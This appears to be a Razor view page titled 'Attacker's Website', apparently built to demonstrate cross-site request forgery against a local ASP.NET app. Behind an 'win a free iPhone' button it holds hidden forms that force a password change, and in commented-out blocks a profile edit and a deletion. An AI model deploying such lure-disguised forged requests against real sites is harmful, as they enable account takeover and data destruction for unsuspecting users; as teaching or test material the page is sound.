<h3>Attacker's Website</h3>


<form method="post" action="https://localhost:7171/UserProfile/ChangePassword?id=p1">
    <input type="hidden" name="UserName" value="test1" />
    <input type="hidden" name="NewPassword" value="999999" />
    <input type="hidden" name="ConfirmPassword" value="999999" />

    <button type="submit">Click here to win a free iPhone!</button>
</form>


@*<form method="post" action="https://localhost:7171/UserProfile/Edit?id=p1">
    <input type="hidden" name="UserId" value="0" />
    <input type="hidden" name="Id" value="p1" />
    <input type="hidden" name="Name" value="" />
    <input type="hidden" name="Dob" value="1990-01-01" />
    <input type="hidden" name="Adhar" value="999999999999" />
    <input type="hidden" name="User" value="null" />

    <button type="submit">Click here to win a free iPhone!</button>
</form>*@

@*<form method="post" action="https://localhost:7171/UserProfile/Delete?id=p1">
    <input type="hidden" name="id" value="t5" />

    <button type="submit">Click here to win a free iPhone!</button>
</form>*@
